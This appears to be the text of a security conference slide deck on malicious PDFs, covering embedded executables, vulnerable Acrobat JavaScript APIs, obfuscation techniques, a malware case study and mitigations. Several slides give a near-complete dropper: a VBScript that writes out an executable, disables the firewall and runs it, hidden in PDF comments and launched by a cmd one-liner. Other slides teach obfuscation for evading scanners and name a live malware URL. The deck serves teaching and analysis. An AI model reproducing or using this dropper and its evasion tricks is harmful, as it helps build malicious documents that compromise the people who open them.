  • 33. Step 1 : Embed the hex content of the exe in a vbscript Dim b,bl Function c(d) c=chr(d) End Function b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)....,"") bl = 3072 Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.OpenTextFile(“helpme.exe", 2, True) For i = 0 To bl f.write(b(i)) Next f.close() Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "netsh firewall set opmode disable", 0, True WshShell.Run "helpme.exe", 0, False WshShell.Run "taskkill /IM cmd.exe /F", 0, False Hex content of the exe as a character array
  • 34. Step 2 : Embed the vbscript in the pdf file as comments %'SS %Dim b,bl;Set WshShell = Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close(); Set WshShell = WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False %'EE 6 0 obj [/PDF /Text] endobj
  • 35. Step 3 : Launch cmd.exe and create another script /c echo Set fso=CreateObject("Scripting.FileSystemObject") > execute.vbs && echo Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >> execute.vbs && echo pf=f.ReadAll >> execute.vbs && echo s=InStr(pf,"'SS") >> execute.vbs && echo e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e- s) >> execute.vbs && echo Set z=fso.OpenTextFile("toexecute.vbs", 2, True) >> execute.vbs && echo s = Replace(s,"%","") >> execute.vbs && echo s = Replace(s,";",vbcrlf) >> execute.vbs && echo z.Write(s) >> execute.vbs && execute.vbs && toexecute.vbs
  • 36. Generated VBScript Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) pf=f.ReadAll s=InStr(pf,"'SS") e=InStr(pf,"'EE") s=Mid(pf,s,e-s) Set z=fso.OpenTextFile("toexecute.vbs", 2, True) s = Replace(s,"%","") s = Replace(s,";",vbcrlf) z.Write(s)
  • 37. AcroJS • AcroJsApi • VulnerableApi’s • Obfuscation Techniques • CaseStudy
  • 38. AcroJS • Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products. • Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers. • This functionality includes the following features, – Processing forms within the document – Batch processing collections of PDF documents – Developing and maintaining online collaboration schemes – Communicating with local databases – Controlling multimedia events
  • 39. JavaScript Actions • A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter. • Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual ap-pearances. PARAMETERS /S Type - name (Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action. /JS Type - text string or text stream (Required) A text string or text stream containing the JavaScript script to be exe-cuted.
  • 43. Vulnerable APIs • getIcons() [CVE-2009-0927] – Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658. • Util.printf() [CVE-2008-2992][CVE-2008-1104] – Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104. – Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
  • 44. Vulnerable APIs • getAnnots() [CVE-2009-1492] – The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments. • customDictionaryOpen() [CVE-2009-1493] – The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
  • 45. Vulnerable APIs • Doc.media.newPlayer [CVE-2009-4324] – Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009. • Collab.collectEmailInfo [CVE-2007-5659] – Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
  • 46. Obfuscation Techniques Why?  To make analysis more difficult  To avoid detection by virus scanners Ways?  Using javascript Obfuscation  Using Pdf Obfuscations(Filters)
  • 47. Javascript Obfuscations : Unlearn Coding Ethics
  • 48. Distorting format Normal Code Obfuscated Code function execute(data, time) { Timelag=5000; if (time > Timelag) { // some code } } function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; } } function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}} function overflow(hex, loop) {for i=0;i<loop;i++){hex = hex + hex;}}
  • 49. Obfuscating Identifiers Normal Code Obfuscated Code function execute(data, time) { Timelag=5000; if (time > Timelag) { // some code } } function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; } } function aeiou(lIlIIlI, O0OOOO0OO000OO) { WWMWMMWMWMWMW=5000; if (O0OOOO0OO000OO > WWMWMWMWMWMW) { // some code } } function aimpq(xxwmnnx, pqrtxw) { for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++) { xxwmnnx = xxwmnnx + xxwmnnx;; } }
  • 50. Obfuscating Identifiers – Even Worse Differentiating with number of underscore characters function _____(____,__________) { ______________=5000; if (__________>______________) { // some code } } function ___(_______, ______) { for(________________=0; ________________<______; ________________ ++) { _______ = _______ + _______; } }
  • 51. Obfuscating Identifiers – Even Worse Differentiating with number of underscore characters function _____(____,__________){______________=5000;if (__________>______________){// some code}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
  • 52. Chain of Eval Normal Code Obfuscated code app.alert(“c0c0n”) func="eval"; one='app.alert("c0c0n")'; two=eval(one); three=eval(two); eval(func(three));
  • 53. Splitting Javascript Normal code Obfuscated Code app.alert(“hello world”); Rt=“);”; Td=“ert(”hel”; Ab=“ap”; Qw=“ld””; Kg=“p.al”; Gh=“lo wor”; Eval(“hh=Ab+Kg+Td+Gh+Qw+Rt”); Eval(hh);
  • 54. Callee Trick Function accesses its own source and uses it as a key to decrypt code or data function decrypt(cypher) { var key = arguments.callee.toString(); for (var i = 0; i < cypher.length; i++) { plain = key.charCodeAt(i) ^ cypher.charCodeAt(i); } ... }
  • 55. Pdf obfuscations Using Filters for streams. Most common encoding techniques -  ASCIIHEXDecode,  ASCII85Decode,  LZWDecode,  FlateDecode,  RunLengthDecode
  • 56. Case Study Malware found from - www.malwaredomainlist.com File link www.bigiqwars.ru/ppp/exp/pdf.php? user=admin&pdf_acces=on Added on – 29th july 2010
  • 57. Virus total Reports 5/42(11.90%)
  • 60. STEP-2 Behavioral Analysis Environment • By using vm image • Filemon,Processmon,Regmon,TCPView Results • Under Process ‘AcroRD32.exe’ Was trying to connect to remote site http://bigiqwars.ru/ppp/exe.php? spl=PDF (newPlayer)&user=admin&exe_acces=on
  • 66. Replacing with meaningful identifiers and removing unnecessary comments
  • 68.
  • 70. Road Ahead • Mitigations • Adobe’ssecurity Measures • FutureExploit methods
  • 71. How can we protect ourselves • Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default. • Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background. • Always install the latest patch/update, even for older Adobe product versions. • Disable Javascript • Uncheck ‘Allow non-PDF gile attachments with external applications’ to prevent launch action vulnerability. • PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on, however alternative programs are just as vulnerable to malware as they gain popularity.
  • 72. Road Ahead Focus Less on javascript exploits Attackers focusing more on embedded objects inside pdf i.e flash Adobe to introduce sandboxing to limit Reader exploits
  • 74. Tools used Malzilla Mozilla addon javascript deobfescator by Wladimir Palant Vmware Player Sysinternal tools Processmon,filemon,regmon,tcpview WinHex HexEdit
  • 75. References  www.malwaredomainlist.com  www.adobe.com/  www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on  www.blog.didierstevens.com  www.jsbeautifier.org  http://research.globalthoughtz.com  http://www.zdnet.com/  http://www.scansafe.com/  http://www.computerworld.com/s/article/9176117/  http://www.darkreading.com/  http://www.virustotal.com/  http://recon.cx/  http://www.blog.zynamics.com
  • 76. References continued..  http://www.marketwire.com/  http://www.symantec.com/  http://www.securelist.com/en/analysis  http://contagiodump.blogspot.com/  http://www.f-secure.com/  http://www.securelist.com/  http://www.secureworks.com/  http://en.wikipedia.org/  http://www.malwaredomainlist.com/  http://blogs.adobe.com/  http://blog.fireeye.com/  http://intrepidusgroup.com/  http://www.vupen.com

Editor's Notes

  1. THE ADOBE PORTABLE DOCUMENT FORMAT (PDF) is a file format for rep- resenting documents in a manner independent of the application software, hard- ware, and operating system used to create them and of the output device on which they are to be displayed or printed. A document’s pages (and other visual elements) may contain any combination of text, graphics, and images. A page’s appearance is described by a PDF content stream, which contains a sequence of graphics objects to be painted on the page. This appearance is fully specified; all layout and formatting decisions have al- ready been made by the application generating the content stream. In addition to describing the static appearance of pages, a PDF document may contain interactive elements that are possible only in an electronic representa- tion. PDF supports annotations of many kinds for such things as text notes, hypertext links, markup, file attachments, sounds, and movies. A document can define its own user interface; keyboard and mouse input can trigger actions that are specified by PDF objects. The document can contain interactive form fields to be filled in by the user, and can export the values of these fields to or import them from other applications.
  2. Distorting format – Removing newlines and spaces - Not much of pain to deobfuscate (ex-jsbeautifier.org)
  3. Name obfuscation – variable name and function name are renamed Most common obfuscation techniques
  4. JavaScript code can execute JavaScript code in strings through eval •Often used to hide later code stages which are decrypted on the fly •Common way to extract argument: replace eval with a printing function
  5. Not specific to Adobe Reader •Frequently used by JavaScript code in other contexts •Function accesses its own source and uses it as a key to decrypt code or data •Add a single whitespace and decryption fails
  6. Online decoders available to decode them….
  7. We can not hit the pdf file link directly,So we chose WGET to download that file contents
  8. Javascript Found on object 11 0.. Encoded with ascii85Encoding.. First obfuscation – filters…
  9. Second Obfucation – Distorted formatting.
  10. Third Obfuscation – Obfuscated identifiers and unnecessary comments
  11. Fourth obfucation – eval chains
  12. Fifth obfuscation – javascript splitting